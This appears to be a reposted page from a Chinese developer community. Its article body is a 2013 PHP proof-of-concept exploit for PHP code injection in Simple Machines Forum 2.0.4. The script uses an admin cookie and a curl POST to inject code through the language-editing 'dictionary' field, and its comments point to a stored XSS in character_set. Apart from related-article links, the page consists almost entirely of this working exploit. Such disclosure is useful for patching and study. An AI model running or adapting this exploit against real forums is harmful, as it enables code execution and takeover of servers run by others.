备案控制台

开发者社区开发与运维文章正文

SMF 2.0.4 PHP Code Injection

2013-05-09 658

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介：

<?php

// proof of concept that latest SMF (2.0.4) can be exploited by php injection.

// payload code must escape from \', so you should try with something like that:
// p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.
// For character_set - another story, as far as I remember, because here we have
// a nice stored xss. ;)

// 21/04/2013 
// http://HauntIT.blogspot.com

// to successfully exploit smf 2.0.4 we need correct admin's cookie:
$cookie = 'SMFCookie956=allCookiesHere';
$ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');

curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$page = curl_exec($ch);

echo 'PHP code:<br>'.$page;

curl_close($ch); // to close 'logged-in' part

?>

文章标签：

云数据库 ClickHouse

PHP

关键词：

PHP injection

PHP Code

PHP code injection

cnbird

目录

相关文章

真的很搞笑

|

4月前

|

Java 中间件 Serverless

Serverless 应用引擎操作报错合集之在阿里函数计算中，云函数怎么一直报错Function instance exited unexpectedly(code 1, message:operation not permitted) with start command 'php server.php '.如何解决

Serverless 应用引擎（SAE）是阿里云提供的Serverless PaaS平台，支持Spring Cloud、Dubbo、HSF等主流微服务框架，简化应用的部署、运维和弹性伸缩。在使用SAE过程中，可能会遇到各种操作报错。以下是一些常见的报错情况及其可能的原因和解决方法。

真的很搞笑

106 2 2

owenzhang

|

移动开发 PHP

Visual Studio Code中的PHP提示错误：End of line character is invalid

Visual Studio Code中的PHP提示错误：End of line character is invalid

owenzhang

111 0 0

owenzhang

|

小程序 JavaScript PHP

基于PHP方法，微信公众号小程序获取code,access_token,openid,用户信息

基于PHP方法，微信公众号小程序获取code,access_token,openid,用户信息

owenzhang

268 0 0

码农技术君

|

JavaScript 前端开发 IDE

VSCode插件 code runner执行PHP,JavaScript,Python

VSCode插件 code runner执行PHP,JavaScript,Python

码农技术君

728 0 0

Lansonli

|

安全 PHP C++

VS Code配置PHP XDebug

VS Code配置PHP XDebug

Lansonli

387 0 0

VS Code配置PHP XDebug

码农技术君

|

JavaScript 前端开发 PHP

VSCode插件 code runner执行PHP,JavaScript,Python

VSCode插件 code runner执行PHP,JavaScript,Python

码农技术君

175 0 0

游客4llb6htoixmxw

|

PHP

如何使用Visual Studio Code调试PHP CLI应用和Web应用

在按照Jerry的公众号文章什么？在SAP中国研究院里还需要会PHP开发？进行XDebug在本地的配置之后，如果想使用Visual Studio Code而不是Eclipse来调试PHP应用，步骤也比较简单。

游客4llb6htoixmxw

1310 0 0

淘尽狂沙

|

PHP C++

visual studio code 安装 PHP IntelliSense 报错

vs code (版本1.28)安装完PHP IntelliSense , 报错 :PHP executable not found. Install PHP 7 and add it to your PATH or set the php.

淘尽狂沙

6207 0 0

技术小胖子

|

XML PHP 数据安全/隐私保护

TCExam文件代码注释分析（shard/code/tce_authorization.php）

技术小胖子

1376 0 0

php的小菜鸟

|

PHP

TP5使用二维码PHP QR Code生成带LOGO和不带LOGO的二维码

首先下载这个类：http://phpqrcode.sourceforge.net/ 然后，把下载的文件放到thinkphp/library/Vendor下面，（注意：Vendor的首字母大写。

php的小菜鸟

2071 0 0

热门文章

最新文章

PHP集成开发环境里面的www问题

第二课初识PHP程序

php中的move_uploaded_file

PHP编程效率的20个要点

PHP中遍历stdclass object 及 json

cgi fastcgi php-cgi php-fpm

php-5.2.16 yum源

PHP安装eAccelerator加速器的配置信息

centos安装nginx+mysql+php+fastcgi+memcache最简单方法

高手指南PHP安装配置

PHP-ereg()函数

web简易开发(二){html5+php实现文件上传及通过关键字搜索已上传图片)}

php如何实现检测nginx配置的正确性

深入PHP内核：探索Opcode缓存机制

深入PHP扩展开发：打造高效自定义模块

深入解析PHP的命名空间与自动加载机制

DIY私人图床：使用CFimagehost源码自建无需数据库支持的PHP图片托管服务-2

DIY私人图床：使用CFimagehost源码自建无需数据库支持的PHP图片托管服务-1

PHP中的命名空间深入理解与实践

深入PHP内核：探索高性能脚本编程的秘密

相关课程

更多

PHP进阶教程 - 由浅入深掌握面向对象开发 - 第二阶段

PHP完全自学手册文档教程

相关电子书

更多

阿里云栖开发者沙龙PHP技术专场-深入浅出网络编程与swoole内核-吴镇宇

PHP安全开发:从白帽角度做安全

PHP 2017.北京全球开发者大会——高可用的PHP

相关实验场景

更多

1分钟SAE部署PHP商城小程序

10分钟Serverless部署PHP商城

下一篇

使用OSS上传下载文件